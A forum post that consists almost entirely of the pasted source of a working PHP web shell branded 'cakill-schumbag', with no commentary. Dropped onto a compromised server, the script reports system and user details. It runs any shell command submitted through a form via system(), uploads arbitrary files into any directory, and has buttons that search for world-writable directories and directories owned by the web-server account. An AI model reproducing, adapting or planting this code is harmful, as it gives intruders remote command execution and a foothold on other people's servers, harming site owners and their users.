It looks like you're new here. If you want to get involved, click one of these buttons!
<html>
<head>
<body text=\"#00ff00\" bgcolor=\"#000000\">
<title>cakill schumbag</title>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
<center><font face=\"trebuchet ms\" size=\"4\"><b>Created By cakill-schumbag </b></p></center>
<?php
print \"<style>body{text:#999999;bgcolor:#000000;font-family:tahoma ms;font-size:15px;}hr{width:100%;height:2px;}</style>\";
print \"<center><h1>thank's 4all keluarga laknat</h1></center>\";
print \"<hr><hr>\";
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == \"\") $chdir = getcwd( );
if(!$whoami)$whoami=exec(\"whoami\");
?>
<TABLE BORDER=\"0\" CELLPADDING=\"0\" CELLSPACING=\"0\">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b><span style=\"font-size: 9pt\"><?= $info ?>
<span style=\"font-size: 9pt\">:</b> <?= $value ?></span></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
<span style=\"font-size: 9pt\">User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
<span style=\"font-size: 9pt\">Server Services:</b> <?= \"$SERVER_SOFTWARE $SERVER_VERSION\"; ?>
</span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
<span style=\"font-size: 9pt\">Permision Directory:</b> <? if(@is_writable($chdir)){ echo \"Yes\";
}else{ echo \"No\"; } ?>
</span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
<span style=\"font-size: 9pt\">Server Address:</b> <?= \"$SERVER_ADDR $SERVER_NAME\"; ?>
</span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
<span style=\"font-size: 9pt\">Current User:</b> <?= $user ?></span></DIV></TD>
</TR>
<TR>
<TD align=\"left\"><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>
<span style=\"font-size: 9pt\">PHP Version:</b> <?= $ver ?></span></DIV></TD>
</TR>
</TABLE>
</b>
</div></font></div>
<?php
set_magic_quotes_runtime(0);
$currentWD = str_replace(\"\\\\\",\"\\\",$_POST['_cwd']);
$currentCMD = str_replace(\"\\\\\",\"\\\",$_POST['_cmd']);
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
if( $currentWD == \"\" ) {
$currentWD = $SCWD;
}
if( $_POST['_act'] == \"List File\" ) {
$currentCMD = \"ls -la\";
}
if( $_POST['_act'] == \"IP\" ) {
$currentCMD = \"/sbin/ifconfig|grep inet\";
}
if( $_POST['_act'] == \"Proses\" ) {
$currentCMD = \"ps -wx\";
}
if( $_POST['_act'] == \"Memory\" ) {
$currentCMD = \"free\";
}
if( $_POST['_act'] == \"777\" ) {
$currentCMD = \"find / -perm 777 -type d\";
}
if( $_POST['_act'] == \"nobody\" ) {
$currentCMD = \"find / -user nobody -type d\";
}
if( $_POST['_act'] == \"apache\" ) {
$currentCMD = \"find / -user apache -type d\";
}
if( $_POST['_act'] == \"httpd\" ) {
$currentCMD = \"find / -user httpd -type d\";
}
if( $_POST['_act'] == \"www\" ) {
$currentCMD = \"find / -user www -type d\";
}
if( $_POST['_act'] == \"www-data\" ) {
$currentCMD = \"find / -user www-data -type d\";
}
print \"<form method=post enctype=\\"multipart/form-data\\"><hr><hr><table>\";
print \"<tr><td><b>Command:</b></td><td><input size=100 name=\\"_cmd\\"
value=\\"\".$currentCMD.\"\\"></td>\";
print \"<td><input type=submit name=_act value=\\"Run\\"></td></tr>\";
print \"<tr><td><b>Directory:</b></td><td><input size=100 name=\\"_cwd\\"
value=\\"\".$currentWD.\"\\"></td>\";
print \"<td><input type=submit name=_act value=\\"List File\\"></td></tr>\";
print \"<tr><td><b>Upload file:</b></td><td><input size=88 type=file name=_upl></td>\";
print \"<td><input type=submit name=_act value=\\"Upload\\"></td></tr>\";
print \"<tr><td><b>Find:</b></td>\";
print \"<td><input type=submit name=_act value=\\"IP\\"><b> <b><input type=submit name=_act
value=\\"Proses\\"><b> <b><input type=submit name=_act value=\\"777\\"><b> <b><input type=submit
name=_act value=\\"nobody\\"><b> <b><input type=submit name=_act value=\\"apache\\"><b> <b><input
type=submit name=_act value=\\"httpd\\"><b> <b><input type=submit name=_act value=\\"www\\"><b>
<b><input type=submit name=_act value=\\"www-data\\"></td></tr>\";
print \"</table></form><hr><hr>\";
$currentCMD = str_replace(\"\\\\"\",\"\\"\",$currentCMD);
$currentCMD = str_replace(\"\\\'\",\"\'\",$currentCMD);
if( $_POST['_act'] == \"Upload\" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print \"<center><b>Error Upload Failed!!!</b></center>\";
} else {
print \"<center><pre>\";
system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD.\"/\".$_FILES['_upl']['name'].\" 2>&1\");
print \"</pre><b>Upload File Succes!!!</b></center>\";
}
} else {
print \"\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n\";
$currentCMD = \"cd \".$currentWD.\";\".$currentCMD;
system(\"$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
/tmp/cmdtemp\");
print \"\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Cakill-Schumbag</b></center>\";
}
exit;
?>